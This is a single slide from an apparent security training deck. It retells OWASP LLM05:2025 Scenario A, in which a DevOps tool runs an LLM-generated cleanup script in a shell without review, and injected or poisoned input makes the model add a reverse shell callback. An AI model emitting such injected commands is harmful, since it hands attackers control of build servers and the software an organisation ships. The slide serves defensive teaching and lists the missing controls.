Slide 14 of 27
Part 3 · ScenariosSlide 14
PART 3
Scenarios
Slides 14–17 · OWASP’s official scenarios, told concretely
Slide 14 · Scenario 1 of 4
A DevOps tool runs the LLM’s script. No questions asked.
OWASP LLM05:2025 Scenario A, retold concretely.
OWASP SCENARIO A
LLM Output Executed Directly in a System Shell
A DevOps platform uses an LLM to generate infrastructure scripts. An engineer asks: "Write a cleanup script for old Docker images on our build server." The LLM generates a bash script. The platform passes it to subprocess.run(shell=True) without review. An attacker who can influence the engineer’s input — or who has poisoned a document the LLM retrieved — causes the model to include a second command: a reverse shell callback. The script runs. The attacker has a shell on the build server.
Why it matters: CI/CD systems run with elevated permissions. A compromised build server can tamper with every artifact the organization ships. This is a supply-chain attack delivered through improper output handling.
What Was Missing

→ LLM output was never reviewed before execution
→ No sandbox or container boundary around the script runner
→ No allowlist of permitted commands
→ shell=True — the most dangerous subprocess flag

← BackNext → Scenario 2: XSS in a web app